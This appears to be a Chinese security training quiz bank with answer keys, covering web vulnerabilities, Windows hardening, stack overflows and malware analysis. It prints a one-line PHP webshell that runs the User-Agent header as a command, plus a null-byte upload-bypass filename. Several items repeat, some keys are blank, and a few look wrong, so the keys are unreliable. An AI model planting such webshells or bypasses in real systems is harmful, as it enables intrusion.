C、 不能用全等于来判断

D、 以上说法都不正确

您的答案: 标准答案: A

27、Nginx <8.03 空字节代码执行漏洞我们通过访问下面什么文件名来执行?

A、 xxx.asp;.jpg

B、 /xxx.asp/xxx.jpg

C、 /xxx.cer

D、 xxx.jpg%00.php

您的答案: 标准答案: D

28、在IIS7.0/IIS 7.5/Nginx < 0.8.3畸形解析漏洞中,默认Fast-CGI是不开启的,这句话正确吗?

A、 对

B、 错

您的答案: 标准答案: B

29、在iconv转码的过程中,utf转为gb2312会出现什么问题?

A、 字符串变成ASCII码了

B、 字符串为空了

C、 字符串变乱码了

D、 字符串被截断

您的答案: 标准答案: D

30、AngularJS是什么?

A、 Web应用

B、 Web前端框架

C、 Web服务端语言

D、 数据库

您的答案: 标准答案: B

31、Node.js能通过JavaScript语言开发web服务端吗?

A、 对

B、 错

您的答案: 标准答案: A

32、刷新和转到谁会更新本地的缓存?

A、 刷新

B、 转到

C、 刷新和转到都会更新

D、 刷新和转到都不会更新

您的答案: 标准答案: A

33、WWW的全称是什么?

A、 Wiki Wiki Web

B、 World Wide Web

C、 World Weather Watch

D、 Whole Wide World

您的答案: 标准答案: B

34、Bootstrap是哪个公司推出的前端开发开源工具包?

A、 Google

B、 Facebook

C、 Twitter

D、 Microsoft

您的答案: 标准答案: C

35、CMS是Content Management System的缩写?

A、 对

B、 错

您的答案: 标准答案: A

36、Django是什么语言编写的Web框架?

A、 PHP

B、 JavaScript

C、 Python

D、 Java

您的答案: 标准答案: C

37、下面关于ASP的表述中正确的是?

A、 ASP只能用写字板打开编辑

B、 ASP是一套客户端脚本运行环境

C、 ASP程序可以包含纯文字、HTML标记以及脚本语言

D、 ASP是一种跨平台的服务器的嵌入式脚本语言

您的答案: 标准答案: C

38、IIS的全称是什么?

A、 Internet Information System

B、 Industry Information Security

C、 Immunization Information Systems

D、 Internet Information Services

您的答案: 标准答案: D

39、数据库的特点之一是数据共享,严格地讲,这里的数据共享指的是什么?

A、 同一应用中的多个程序共享一个数据集合

B、 多个用户共享一个数据文件

C、 多个用户、同一种语言共享数据

D、 多种应用、多种语言、多个用户相互覆盖地使用数据集合

您的答案: 标准答案: D

40、Cookie在本地会有存储,这句话对吗?

A、 对

B、 错

您的答案: 标准答案: A

41、Windows是美国哪个公司研发的一套操作系统?

A、 Yahoo!

B、 Google

C、 iTunes

D、 Microsoft

您的答案: 标准答案: D

42、Google Chrome浏览器不可以在Linux操作系统下使用,这句话对吗?

A、 对

B、 错

您的答案: 标准答案: B

43、HTTP协议对事物处理有记忆能力,这句话对吗?

A、 对

B、 错

您的答案: 标准答案: B

44、TCP/IP是哪个层的协议

A、 表示层

B、 会话层

C、 应用层

D、 传输层

您的答案: 标准答案: C

45、以下哪些层是属于TCP/IP参考模型

A、 应用层

B、 传输层

C、 互联网层

D、 网络访问层

您的答案: 标准答案:

46、服务器错误服务不可用返回的数字是什么

A、 200

B、 403

C、 503

D、 502

您的答案: 标准答案: C

47、下面那个是不属于HTTP报头

A、 普通报头

B、 正文报头

C、 请求报头

D、 响应报头

您的答案: 标准答案: B

48、返回的状态码是200代表着什么

A、 客户端请求有语法错误,不能被服务器所理解

B、 服务器收到请求,但是拒绝提供服务。

C、 服务器发生不可预期的错误。

D、 客户端请求成功

您的答案: 标准答案: D

49、HTTP POST DOS拒绝服务攻击原理是在发送HTTP POST包时,指定一个非常大的Content-Length值,然后以很低的速度发包,比如10~100s发一个字节,保持住这个连接不断开。这样当客户端连接数多了以后,占用住了Web Server的所有可用连接,从而导致DOS。

A、 对

B、 错

您的答案: 标准答案: A

50、SQLI-LABS是一个什么漏洞练习平台

A、 SQL Injection

B、 XSS

C、 CSRF

D、 命令执行

您的答案: 标准答案: A

1、burpsuite不可以抓到HTTPS的内容这句话对吗

A、 对

B、 错

您的答案: 标准答案: B

2、使用burpsuite爆破时在哪里设置Payload type为Numbers?

A、 Repeater下的payloads

B、 Intruder下的Payloads

C、 Proxy下的payloads

D、 Intruder下Target

您的答案: 标准答案: B

3、Webshell的功能不能实现读取注册表,这句话对吗?

A、 对

B、 错

您的答案: 标准答案: B

4、<?php system($_SERVER['HTTP_USER_AGENT'])?>这句webshell通过下面什么方式来执行的呢?

A、 参数HTTP_USER_AGENT

B、 HTTP请求头HTTP_USER_AGENT

C、 参数$_SERVER[‘HTTP_USER_AGENT’]

D、 参数system

您的答案: 标准答案: B

5、在php中使用全等于来判断大写的PHP和小写的php是否相等,以下说法正确的是?

A、 不相等

B、 相等

C、 不能用全等于来判断

D、 以上说法都不正确

您的答案: 标准答案: A

6、Nginx <8.03 空字节代码执行漏洞我们通过访问下面什么文件名来执行?

A、 xxx.asp;.jpg

B、 /xxx.asp/xxx.jpg

C、 /xxx.cer

D、 xxx.jpg%00.php

您的答案: 标准答案: D

7、在IIS7.0/IIS 7.5/Nginx < 0.8.3畸形解析漏洞中,默认Fast-CGI是不开启的,这句话正确吗?

A、 对

B、 错

您的答案: 标准答案: B

8、在iconv转码的过程中,utf转为gb2312会出现什么问题?

A、 字符串变成ASCII码了

B、 字符串为空了

C、 字符串变乱码了

D、 字符串被截断

您的答案: 标准答案: D

9、AngularJS是什么?

A、 Web应用

B、 Web前端框架

C、 Web服务端语言

D、 数据库

您的答案: 标准答案: B

10、Node.js能通过JavaScript语言开发web服务端吗?

A、 对

B、 错

您的答案: 标准答案: A

11、刷新和转到谁会更新本地的缓存?

A、 刷新

B、 转到

C、 刷新和转到都会更新

D、 刷新和转到都不会更新

您的答案: 标准答案: A

12、WWW的全称是什么?

A、 Wiki Wiki Web

B、 World Wide Web

C、 World Weather Watch

D、 Whole Wide World

您的答案: 标准答案: B

13、Bootstrap是哪个公司推出的前端开发开源工具包?

A、 Google

B、 Facebook

C、 Twitter

D、 Microsoft

您的答案: 标准答案: C

14、CMS是Content Management System的缩写?

A、 对

B、 错

您的答案: 标准答案: A

15、Django是什么语言编写的Web框架?

A、 PHP

B、 JavaScript

C、 Python

D、 Java

您的答案: 标准答案: C

16、下面关于ASP的表述中正确的是?

A、 ASP只能用写字板打开编辑

B、 ASP是一套客户端脚本运行环境

C、 ASP程序可以包含纯文字、HTML标记以及脚本语言

D、 ASP是一种跨平台的服务器的嵌入式脚本语言

您的答案: 标准答案: C

17、IIS的全称是什么?

A、 Internet Information System

B、 Industry Information Security

C、 Immunization Information Systems

D、 Internet Information Services

您的答案: 标准答案: D

18、数据库的特点之一是数据共享,严格地讲,这里的数据共享指的是什么?

A、 同一应用中的多个程序共享一个数据集合

B、 多个用户共享一个数据文件

C、 多个用户、同一种语言共享数据

D、 多种应用、多种语言、多个用户相互覆盖地使用数据集合

您的答案: 标准答案: D

19、Cookie在本地会有存储,这句话对吗?

A、 对

B、 错

您的答案: 标准答案: A

20、Windows是美国哪个公司研发的一套操作系统?

A、 Yahoo!

B、 Google

C、 iTunes

D、 Microsoft

您的答案: 标准答案: D

21、Google Chrome浏览器不可以在Linux操作系统下使用,这句话对吗?

A、 对

B、 错

您的答案: 标准答案: B

22、HTTP协议对事物处理有记忆能力,这句话对吗?

A、 对

B、 错

您的答案: 标准答案: B

23、TCP/IP是哪个层的协议

A、 表示层

B、 会话层

C、 应用层

D、 传输层

您的答案: 标准答案: C

24、以下哪些层是属于TCP/IP参考模型

A、 应用层

B、 传输层

C、 互联网层

D、 网络访问层

您的答案: 标准答案:

25、服务器错误服务不可用返回的数字是什么

A、 200

B、 403

C、 503

D、 502

您的答案: 标准答案: C

26、下面那个是不属于HTTP报头

A、 普通报头

B、 正文报头

C、 请求报头

D、 响应报头

您的答案: 标准答案: B

27、返回的状态码是200代表着什么

A、 客户端请求有语法错误,不能被服务器所理解

B、 服务器收到请求,但是拒绝提供服务。

C、 服务器发生不可预期的错误。

D、 客户端请求成功

您的答案: 标准答案: D

28、HTTP POST DOS拒绝服务攻击原理是在发送HTTP POST包时,指定一个非常大的Content-Length值,然后以很低的速度发包,比如10~100s发一个字节,保持住这个连接不断开。这样当客户端连接数多了以后,占用住了Web Server的所有可用连接,从而导致DOS。

A、 对

B、 错

您的答案: 标准答案: A

29、SQLI-LABS是一个什么漏洞练习平台

A、 SQL Injection

B、 XSS

C、 CSRF

D、 命令执行

您的答案: 标准答案: A

30、Linux中提供了很多的网卡配置工具,下面哪个不属于Linux中配置网络的命令?

A、 netconfig

B、 prtconf

C、 ifconfig

D、 linuxconfig

您的答案: 标准答案: B

31、下面哪个参数可以让nmap不检测主机存活

A、 -sL

B、 -sn

C、 -Pn

D、 -PS

您的答案: 标准答案: C

32、在Metasploit中,我们使用什么命令加载第三方模块,如Nmap

A、 exploit_nmap

B、 show_nmap

C、 db_nmap

D、 run_nmap

您的答案: 标准答案: C

33、parallels desktop是哪个平台下的虚拟机软件

A、 Windows

B、 Android

C、 Mac OS

D、 Linux

您的答案: 标准答案: C

34、Kali Linux 前身是什么?

A、 NodeZero

B、 BackTrack

C、 Matriux

D、 Anonymous-OS

您的答案: 标准答案: B

35、在使用Python的Socket模块编程的时候,使用下面哪个方法来绑定本地地址

A、 accept

B、 send

C、 bind

D、 listen

您的答案: 标准答案: C

36、在使用Python的Socket模块编程的时候,使用下面哪个方法来发送消息

A、 accept

B、 send

C、 recv

D、 listen

您的答案: 标准答案: B

37、视频中实现的程序无法切换目录,在Python的OS模块中什么函数可以改变当前路径到指定路径

A、 os.remove()

B、 os.chdir()

C、 os.listdir()

D、 os.mkdir()

您的答案: 标准答案: B

38、Python中可以使用什么库来实现多线程

A、 OS

B、 Threading

C、 Time

D、 Socket

您的答案: 标准答案: B

39、在Python中,我们实例化一个Thread对象后,通过什么方法来运行

A、 start()

B、 enumerate()

C、 Thread()

D、 setDaemon()

您的答案: 标准答案: A

40、Python中我们使用try-except语句是为了保证用户是按软件使用要求传入三个参数,这句话对吗

A、 对

B、 错

您的答案: 标准答案: A

41、Python中SocketServer库中handle()函数有什么用?

A、 准备请求处理. 默认什么都不做

B、 处理请求,解析传入的请求,处理数据,并发送响应。默认什么都不做

C、 环境清理。默认什么都不做

D、 通过服务器的构造函数来激活服务器。默认的行为只是监听服务器套接字。可重载。

您的答案: 标准答案: B

42、以下有关代理服务器说法中不正确的是()

A、 为工作站提供访问Internet的代理服务

B、 代理服务器可用作防火墙

C、 使用代理服务器可提高Internet的浏览速度

D、 代理服务器是一种硬件技术,是建立在浏览器与Web服务器之间的服务器

您的答案: 标准答案: D

43、IMAP协议的端口号是多少

A、 80

B、 21

C、 143

D、 25

您的答案: 标准答案: C

44、使用Python编写抓包工具时,利用Python模块scapy中什么方法开始抓包?

A、 arp

B、 ether

C、 sniff

D、 sendp

您的答案: 标准答案: C

45、以下关于ARP欺骗的描述错误的是

A、 ARP欺骗可冒充网关欺骗主机

B、 ARP欺骗可冒充主机欺骗网关

C、 ARP欺骗可冒充主机欺骗其它主机

D、 在主机上静态绑定网关的MAC地址可防止所有ARP欺骗

您的答案: 标准答案: D

46、关于ARP表,以下描述中正确的是

A、 用于建立IP地址到MAC地址的映射

B、 提供常用目标地址的快捷方式来减少网络流量

C、 用于进行应用层信息的转换

D、 用于在各个子网之间进行路由选择

您的答案: 标准答案: A

47、下列关于ARP协议正确的是

A、 全称地址解析协议,通过ARP可以将IP地址解析为MAC地址。

B、 可以实现MAC地址到IP地址的转换。

C、 ARP病毒主要是利用IP地址可以随意更改来实现的。

D、 以上都正确

您的答案: 标准答案: A

48、HTTPS 本质与 HTTP 一样,都属于应用层协议,但 HTTPS 通过安全传输机制——安全套阶层(Secure Socket Layer,SSL)来传送数据。这种说法正确吗()

A、 对

B、 错

您的答案: 标准答案: A

49、在wireshark所抓数据包分析里,SYN响应包是ACK

A、 对

B、 错

您的答案: 标准答案: B

50、可以通过statistics的conversations查看会话及连接的统计详情,这种说法对吗

A、 对

B、 错

您的答案: 标准答案: A

1、下列对于ESP与EBP寄存器的描述错误的是?

A、 EBP在栈空的时候指向的是栈底,ESP指向的是栈底的下一个位置

B、 当参数入栈时,ESP指向的栈地址会向上移动

C、 当有参数入栈时,EBP指向的栈地址会向下移动

D、 EBP标识了当前栈帧的底部,ESP标识了当前栈帧的顶部

您的答案: 标准答案: C

2、下列对于栈溢出漏洞原理的描述错误的是哪条?

A、 可以造成命令执行漏洞

B、 栈溢出漏洞是缓冲区溢出漏洞的一种

C、 由于软件开发人员没有考虑周全造成的漏洞

D、 操作系统的内存管理机制的漏洞

您的答案: 标准答案: D

3、下列对软件壳保护技术描述错误的是?

A、 利用特殊的算法,对EXE、DLL文件里的资源进行压缩、加密

B、 附加在源程序之上,被加载执行的

C、 一般情况下,壳程序在源程序执行之前执行

D、 程序加壳保护,就不会存在源码泄露的风险

您的答案: 标准答案: D

4、下列对虚拟机保护壳描述错误的是?

A、 需要将代码翻译为机器和人都无法识别的一串伪代码字节流

B、 虚拟机就是将无法识别的伪代码字节流翻译为原始代码的一段程序

C、 就是程序在执行时创建一个虚拟机来执行程序,与主机隔离,防止源码外泄

D、 程序在执行时,先执行虚拟机程序将无法识别的伪代码逐步翻译

您的答案: 标准答案: C

5、下列关于缓冲区溢出的描述错误的是?

A、 计算机向缓冲区内填充数据位数超过了缓冲区本身的容量

B、 利用缓冲区溢出攻击,可以导致程序运行失败、系统关机、重启等

C、 缓冲区溢出是操作系统的内存管理机制的缺陷

D、 缓冲区溢出中,最为危险的是堆栈溢出

您的答案: 标准答案: C

6、在创建新的栈帧时EBP与ESP分别执行____操作。

A、 add esp,n;pop ebp;ret;

B、 push ebp;move ebp,esp;sub esp,n;

C、 move ebp;push ebp;pop;

D、 push esp;move esp;ret;

您的答案: 标准答案: B

7、下列关于栈描述错误的是?

A、 用于线性存储数据的内存

B、 具有先进后出的特点

C、 只能在一端对数据进行插入和删除

D、 使用的是二级缓存

您的答案: 标准答案: D

8、常见病毒程序中Overlay的起点位于区段表中哪个位置?

A、 倒数第二个区块末尾

B、 第一个区块开头

C、 最后一个区块末尾

D、 第一个区块末尾

您的答案: 标准答案: C

9、下列哪种方式不是病毒一般进行静态分析所采用的方式?

A、 查找字符串

B、 侦壳操作

C、 行为监控

D、 PE分析

您的答案: 标准答案: C

10、下面关于UPX的描述错误的是____。

A、 是一款可执行文件压缩器

B、 upx -9 表示最强程度压缩命令

C、 upx压缩后的文件需要解压后才能执行

D、 upx -d 为解压命令

您的答案: 标准答案: C

11、下面关于VMProtect的描述错误的是____。

A、 VMProtect是一个解释执行引擎

B、 在function层面X86代码和VMProtect不是一一对应的

C、 其本质是一个堆栈机

D、 通过NOR和ADD来实现X86指令的等价运算

您的答案: 标准答案: B

12、下面关于UPX的描述错误的是____。

A、 是一款可执行文件压缩器

B、 upx -9 表示最强程度压缩命令

C、 upx压缩后的文件需要解压后才能执行

D、 upx -d 为解压命令

您的答案: 标准答案: C

13、下面关于VMProtect的描述错误的是____。

A、 VMProtect是一个解释执行引擎

B、 在function层面X86代码和VMProtect不是一一对应的

C、 其本质是一个堆栈机

D、 通过NOR和ADD来实现X86指令的等价运算

您的答案: 标准答案: B

14、下列不属于脚本病毒的特点是:

A、 隐蔽性强

B、 传播性强

C、 爆发性

D、 自我消失性

您的答案: 标准答案: D

15、下列软件中不属于木马文件的是:

A、 PCshare

B、 njRAT

C、 KilerRat

D、 PCHunter

您的答案: 标准答案: D

16、直接通过文件后缀名判断该文件是否具有危害性:

A、 对

B、 错

您的答案: 标准答案: B

17、能够隐藏任务栏图标的软件是:

A、 HideTools

B、 PCHunter

C、 火绒剑

D、 冰刃

您的答案: 标准答案: A

18、下列哪个键值是修改文件关联方式的关键值:

A、 HKEY_CLASS_ROOT\txtfile\shell\open\command

B、 HKEY_CURRENT_USER\txtfile\shell\open\command

C、 HKEY_CLASS_ROOT\txtfile\shell\class\command

D、 HKEY_CURRENT_USER\txtfile\shell\class\command

您的答案: 标准答案: A

19、下列不属于本地安全策略中密码策略的是:

A、 密码必须符合复杂性要求

B、 密码长度最小值

C、 密码最长使用期限

D、 密码长度最大值

您的答案: 标准答案: D

20、开启密码必须符合复杂性要求策略后,下列哪个命令能够成功执行:

A、 net user test 123123 /add

B、 net user test 12312a /add

C、 net user test 123ads /add

D、 net user test 123!adss!! /add

您的答案: 标准答案: D

21、用户登录失败的记录可以通过事件管理器来查看

A、 对

B、 错

您的答案: 标准答案: A

22、用户不可以利用本地安全策略来实现:

A、 编辑计算机上的帐号策略和本地策略

B、 控制访问计算机的用户

C、 启用或禁用开始菜单内的功能选项

D、 修改计算机用户名密码

您的答案: 标准答案: D

23、配置组策略的主要目的是提高计算机安全性

A、 对

B、 错

您的答案: 标准答案: A

24、当计算器网络环境处在域环境中,应当配置哪个防火墙配置文件:

A、 专用配置文件

B、 域配置文件

C、 共用配置文件

D、 局域网配置文件

您的答案: 标准答案: B

25、如何配置远程桌面禁止访问:

A、 在入站规则处将远程桌面已启用选项关闭

B、 在出站规则处将远程桌面已启用选项打开

C、 在入站规则处将远程桌面已启用选项打开

D、 在出站规则处将远程桌面已启用选项关闭

您的答案: 标准答案: A

26、只允许本机访问其他机器的80端口,下面配置正确的是:

A、 在入站规则处新建规则,指定特定端口为80,协议为tcp的流量通行

B、 在出站规则处新建规则,指定特定端口为135,协议为tcp的流量通行

C、 在入站规则处新建规则,指定特定端口为135,协议为tcp的流量通行

D、 在出站规则处新建规则,指定特定端口为80,协议为tcp的流量通行

您的答案: 标准答案: D

27、禁用Windows firewall服务后,windows防火墙能够正常使用

A、 对

B、 错

您的答案: 标准答案: B

28、IPSec通过什么安全性来提供主动的保护以防止专用网络与Internet的攻击

A、 点对点

B、 端对端

C、 点对端

D、 端对点

您的答案: 标准答案: B

29、对于隧道模式说法正确的是:

A、 只对ip有效数据载荷进行封装和加密

B、 安全程度较低

C、 IP源和目标ip地址不加密传送

D、 从外部看不到数据包的路由过程

您的答案: 标准答案: D

30、下列选项中,不属于IPSec的优点是:

A、 除TCP/IP协议之外,不支持其他协议

B、 保护ip数据包的内容

C、 为IPV4和IPV6提供互操作能力

D、 保护ip数据包的内容

您的答案: 标准答案: A

31、新建一个IPSec策略,将源地址为任意地址的icmp协议包禁用,其他人使用ping命令探测本机,无法ping通

A、 对

B、 错

您的答案: 标准答案: A

32、下列属于系统克隆工具的是:

A、 TrueCrypt

B、 javaexec

C、 wce

D、 Ghost

您的答案: 标准答案: D

33、使用Ghost备份系统的步骤,Local->Partition->ToImage.开始备份系统

A、 对

B、 错

您的答案: 标准答案: A

34、对于栈是什么,下面说法正确的是():

A、 用于线性存储数据的内存,数据可以是函数的全局变量

B、 用于线性存储数据的内存,数据可以是函数的全局变量

C、 具有先出后进的特点

D、 与栈有关的操作:push入栈,pop出栈,mov数据传递指令

您的答案: 标准答案: D

35、函数栈帧之间对比错误的是():

A、 ESP内存空间为当前函数的栈帧

B、 EBP标识了当前栈帧的底部

C、 ESP标识了当前栈帧的底部,EBP标识了后面栈帧的顶部

D、 ESP与EBP之间的内存空间为当前函数的栈帧

您的答案: 标准答案: C

36、每个函数都有自己的栈帧,每个函数都是利用自己的栈帧空间保存全局变量与函数的调用关系。()

A、 对

B、 错

您的答案: 标准答案: B

37、如果能控制进程的执行流程,不能够执行想要执行的指令,达到我们目的的指令序列就叫做shellcode。()

A、 对

B、 错

您的答案: 标准答案: B

38、下面是漏洞代码,分析的结果:创建一个ba数组,将ba内容加密,修改ba内容,为ba解密。()

A、 对

B、 错

您的答案: 标准答案: B

39、Flash的JIT并没有检查CFG合法性?()

A、 对

B、 错

您的答案: 标准答案: A

40、漏洞分析有三大分类,正确一项是():

A、 利用位置,威胁类型,技术类型

B、 本地类型

C、 获取服务类型

D、 内存破坏类:动态数据区溢出

您的答案: 标准答案: A

41、构造数据通过程序不断的转播处理,改变了程序执行流程,造成数据被当作代码执行。()

A、 对

B、 错

您的答案: 标准答案: A

42、下面代码不存在溢出漏洞():

A、 对

B、 错

您的答案: 标准答案: B

43、当打开一个漏洞样本的时候,这个样本执行了test.tmp的exe,这个test.tmp还把IE执行起来了。在整个过程当中,那个API函数不可以运行可执行文件():

A、 ShellExecute

B、 Dumpbin

C、 CreateProcess

D、 WinExec

您的答案: 标准答案: B

44、一个PE文件装载进内存里,用OD调式器解释,可以看到有EIP指针,ESP当前函数栈帧,EBP函数栈帧,数据区(全局变量)。()

A、 对

B、 错

您的答案: 标准答案: A

45、堆栈溢出指的是堆溢出。()

A、 对

B、 错

您的答案: 标准答案: B

46、OLE对象包含内容的是():

A、 TXT纯文字文档

B、 PDF、Office、Flash格式文档

C、 EXE格式文档

D、 RAR格式文档

您的答案: 标准答案: B

47、OLE创建包含不同来源的复合文档和应用程序,不同类型的数据,但不能把文字、声音、表格、应用程序组合。()

A、 对

B、 错

您的答案: 标准答案: B

48、栈溢出后,如何利用漏洞?():

A、 少字节可编辑,EBP覆盖,文件格式系统嵌入,Shellcode后台执行,正常保存打开

B、 少字节可编辑,正常保存打开

C、 EBP覆盖,正常保存打开

D、 文件格式系统嵌入,正常保存打开

您的答案: 标准答案: A

49、如何做到栈溢出漏洞利用的技巧?():

A、 样本打开、触发漏洞、返回用户空间、显示正常页面

B、 样本打开、触发漏洞、搜索执行、恢复堆栈、返回用户空间、显示正常页面

C、 搜索执行、返回用户空间、显示正常页面

D、 触发漏洞、显示正常页面

您的答案: 标准答案: B

50、在Windows内置用户中,拥有最高权限的用户什么?( )

A、 Guest

B、 Adminitrator

C、 System

D、 User

您的答案: 标准答案: C

1、在Windows中将用户超级隐藏后,用户仍会在哪里有显示?( )

A、 命令提示符

B、 注册表

C、 用户组

D、 进程

您的答案: 标准答案: D

2、下列哪项不是Windows的常用文件系统?( )

A、 FAT32

B、 FILE

C、 NTFS

D、 EXT

您的答案: 标准答案: B

3、在NTFS文件系统中,子文件系统继承父文件系统权限后,如何修改子文件的权限?( )

A、 在子文件中修改

B、 在父文件中修改

C、 AB都可以

D、 上述都不对

您的答案: 标准答案: B

4、如果Windows中某文件采用EFS加密技术,未授权的其他管理员用户可以对文件进行什么操作?( )

A、 访问

B、 删除

C、 修改

D、 上述都不可以

您的答案: 标准答案: B

5、如何在未授权的情况下访问EFS加密的文件?( )

A、 输入管理员密码

B、 修改用户注册表

C、 导入证书

D、 修改为相同的用户名和密码

您的答案: 标准答案: C

6、在Windows中,为本地磁盘进行配额目的是什么?()

A、 平均分割磁盘

B、 避免部分用户占用磁盘过大

C、 清理垃圾文件

D、 提高磁盘利用率

您的答案: 标准答案: B

7、Windows中,在文件属性“共享”中,无法与之共享的用户是()

A、 Adminstrator

B、 Internet来宾用户

C、 Users

D、 Everyone

您的答案: 标准答案: C

8、Windows中,文件共享后,使用户对该文件权限和NTFS所设权限一样,方法有()

A、 开启共享向导

B、 启用脱机文件

C、 添加网上邻居向导

D、 更改共享对象

您的答案: 标准答案: A

9、Windows中,Service文件存储在什么地方()

A、 System32/config/service

B、 System32/config/system

C、 System/config/system

D、 System/config/service

您的答案: 标准答案: B

10、一个服务的启动类型为system,其在注册表中修改start的值是多少?( )

B、 1

C、 2

D、 3

您的答案: 标准答案: B

11、如何在DOS环境下查看系统当中的进程?

A、 tasklist

B、 taskkill

C、 del

D、 kill

您的答案: 标准答案: A

12、DOS下显示隐藏磁盘目录的命令是什么?

A、 attrib -s

B、 dir /ah

C、 type

D、 tree

您的答案: 标准答案: B

13、对病毒进行行为分析最常用的工具为?

A、 IDA Pro

B、 Process Monitor

C、 OllyDBG

D、 Process Explorer

您的答案: 标准答案: B

14、DOS下net share admin$ /del /y命令的作用是什么?

A、 添加系统根目录的共享

B、 查看共享

C、 取消系统根目录共享

D、 设置共享资源的用户

您的答案: 标准答案: C

15、Windows系统中的文件名查找函数是哪个?

A、 Process32First

B、 Module32First

C、 FindFirstFile

D、 Thread32First

您的答案: 标准答案: C

16、Windows系统终止指定进程及其所有线程的函数是什么?

A、 Process32First

B、 Module32First

C、 TerminateProcess

D、 Thread32First

您的答案: 标准答案: C

17、Windows系统字符连接函数是哪个?

A、 Process32First

B、 Module32First

C、 FindFirstFile

D、 lstrcat

您的答案: 标准答案: D

18、以下哪款工具可以实现查壳的工作?

A、 IDA Pro

B、 PEiD

C、 WinDbg

D、 Process Monitor

您的答案: 标准答案: B

19、在OD工具中,单步步过,单步步入的快捷键分别是什么?

A、 F8 F9

B、 F8 F7

C、 F7 F8

D、 F9 F7

您的答案: 标准答案: B

20、程序的返回值一般保存在以下哪个寄存器中?

A、 eax

B、 ebx

C、 ecx

D、 edx

您的答案: 标准答案: A

21、以下哪项不属于病毒的静态分析?

A、 采用反病毒引擎扫描

B、 计算哈希值

C、 查找字符串

D、 使用沙箱

您的答案: 标准答案: D

22、以下哪项不属于病毒的动态分析?

A、 使用沙箱

B、 行为监控

C、 PE分析

D、 WinDbg调试

您的答案: 标准答案: C

23、Windows获取进程信息建立进程快照的函数是?

A、 Module32First

B、 CreateToolhelp32Snapshot

C、 Process32First

D、 Heap32ListFirst

您的答案: 标准答案: B

24、Exeinfo PE工具的主要作用是什么?

A、 代码审计

B、 程序逆向

C、 查询文件是否加壳

您的答案: 标准答案: C

25、OllyDbg软件主要用于静态分析程序

A、 对

B、 错

您的答案: 标准答案: B

26、下列哪个工具可以查看软件内核模块?

A、 CDD Explorer.exe

B、 XueTr.exe

C、 WinHex

您的答案: 标准答案: B

27、当返回地址被覆盖时,新地址无效,main函数执行完后会执行什么指令?

A、 重新请求

B、 重新返回

C、 重新覆盖

D、 以上都不是

您的答案: 标准答案: D

28、视频中,当main函数执行完毕的时候,esp的值会发生什么变化?

A、 需认为设定为请求地址

B、 需认为设定为返回地址

C、 自动变成返回地址的下一个位置

D、 自动变成返回地址

您的答案: 标准答案: C

29、课程中,在0x00401005的地址处,再次利用什么功能,能够找到调用main函数的位置了?

A、 平行引用

B、 交叉引用

C、 跳位引用

D、 覆盖引用

您的答案: 标准答案: B

30、缓冲区溢出漏洞的原理,它就是因为我们输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了

A、 对

B、 错

您的答案: 标准答案: A

31、这样当CALL执行完后,程序再将该地址出栈,这样就能够知道下一步应该执行哪条指令,该地址称为?

A、 请求地址

B、 返回地址

C、 重复地址

D、 目标地址

您的答案: 标准答案: B

32、关于编写MessageBox()的调用过程中,下列说法错误的是?

A、 MessageBox()这个函数编写过程中,需要包含4个参数

B、 MessageBox()这个函数这个ApI函数包含有四个参数,其中可以给第一和第四个参数赋给0值

C、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为十六进制

D、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为ASCII码

您的答案: 标准答案: C

33、下列说法错误的是?

A、 MessageBoxA这个函数,它位于user32.dll

B、 所有的Win32程序都会自动加载kernel32.dll

C、 为了正常退出程序,还需要使用ExitProcess

D、 为了显示对话框,需要ExitProcess使用这个函数

您的答案: 标准答案: D

34、0x0012FFFF为系统默认的栈的底端

A、 对

B、 错

您的答案: 标准答案: A

35、关于W32Dasm的说法正确的是?

A、 W32Dasm是一款逆向分析软件,是一款比IDA Pro更为流行的软件

B、 W32Dasm是一款逆向分析软件,被誉为破解界的“屠龙刀”

C、 W32Dasm是一款逆向分析软件,因此其本身是不存在任何漏洞的

D、 W32Dasm这款逆向分析工具,但不是一个静态反汇编工具。

您的答案: 标准答案: B

36、MS06-040漏洞指的是?

A、 远程代码执行漏洞

B、 NetpwPathCanonicalize()函数存在着缓冲区溢出的缺陷

C、 心脏滴血漏洞

D、 远程桌面执行漏洞

您的答案: 标准答案: D

37、课程中的程序对字符串的长度限定是unicode的0x411个字符,也就是多少个字节?

A、 0x822

B、 0x823

C、 0x722

D、 2的36次方

您的答案: 标准答案: A

38、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。

A、 对

B、 错

您的答案: 标准答案: A

39、(课程中,删掉)ecx中保存的是哪的地址?

A、 缓冲区结束位置的地址

B、 缓冲区中间位置的地址

C、 缓冲区起始位置的地址

D、 没有任何地址

您的答案: 标准答案: C

40、函数CanonicalizePathName()是不能够被直接调用的。

A、 对

B、 错

您的答案: 标准答案: A

41、Winamp是一款什么软件?

A、 Winamp是一款用于研究栈溢出的软件

B、 Winamp是一款音乐播放软件

C、 Winamp是一款视频播放软件

D、 Winamp是一款用于研究代码漏洞的软件

您的答案: 标准答案: B

42、whatsnew.txt文件位于Winamp文件夹中,保存内容是

A、 软件的更新历史信息

B、 软件的日志信息

C、 软件的备忘信息

D、 软件的回收信息

您的答案: 标准答案: A

43、视频中程序程序使用的是call esp的方法,那么esp所保存的地址是?

A、 0x00BDEDF0

B、 0x00BDEDE0

C、 0x00BDEDE4

D、 0x00BDEDE8

您的答案: 标准答案: D

44、以下哪种情况会造成整数溢出?

A、 inputTest:65535 ,outputTest:65535

B、 inputTest:65539,outputTest:65539

C、 inputTest:65536,outputTest:1

D、 inputTest:65537,outputTest:1

您的答案: 标准答案: D

45、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。

A、 对

B、 错

您的答案: 标准答案: B

46、下列说法错误的是?

A、 无符号整数的下溢和上溢过程会触发安全性

B、 符号问题会触发安全性

C、 在高位数的整数复制到低位数的整数的时候会触发安全性

D、 整数在内存里面保存在一个固定长度的空间内,它能存储的最大值就是不固定

您的答案: 标准答案: D

47、函数sub_40366F一共有几个局部变量,几个参数?

A、 7,0

B、 7,4

C、 7,9

D、 4,7

您的答案: 标准答案: B

48、当代码接下来执行到0x004017BC的位置,会发现改代码的功能是?

A、 循环

B、 覆盖

C、 赋值

D、 清除

您的答案: 标准答案: A

49、krnln.fnr这个文件是加了壳,通过什么定律可以进行脱壳?

A、 ESP定律

B、 CALL定律

C、 main定律

D、 0x02定律

您的答案: 标准答案: A

50、 API函数都保存在操作系统提供的什么文件中?

A、 esp

B、 dat

C、 DLL

D、 exe

您的答案: 标准答案: C

